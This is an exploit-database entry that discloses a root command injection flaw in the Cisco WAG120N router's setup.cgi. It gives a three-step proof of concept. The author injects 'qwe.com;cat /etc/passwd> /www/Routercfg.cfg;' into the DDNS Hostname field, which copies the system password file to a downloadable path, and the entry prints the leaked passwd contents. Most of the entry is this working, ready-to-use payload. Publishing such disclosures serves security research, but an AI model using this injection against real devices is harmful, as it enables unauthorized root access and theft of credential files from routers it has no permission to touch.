Cisco WAG120N Command Execution Vulnerability

2012-11-23T00:00:00
ID 1337DAY-ID-19786
Type zdt
Reporter Manuel Fernandez
Modified 2012-11-23T00:00:00

Description

Cisco WAG120N suffers from a remote command execution vulnerability in setup.cgi.

                                        
                                            Hello, here you have a quick POC in three simple steps

# Remote Command Execution on Cisco WAG120N.
# (Not tested in other routers)
#
# Manuel Fernández Fernández ([email protected])
#
# Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)

1º Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2º All the fields you see are vulnerables to command execution as root, so
inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
field
3º Everything is done, just download the file /Routercfg.cfg (Authenticated
is requiered)

root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh

-- 
Manuel Fernández

#  0day.today [2018-02-27]  #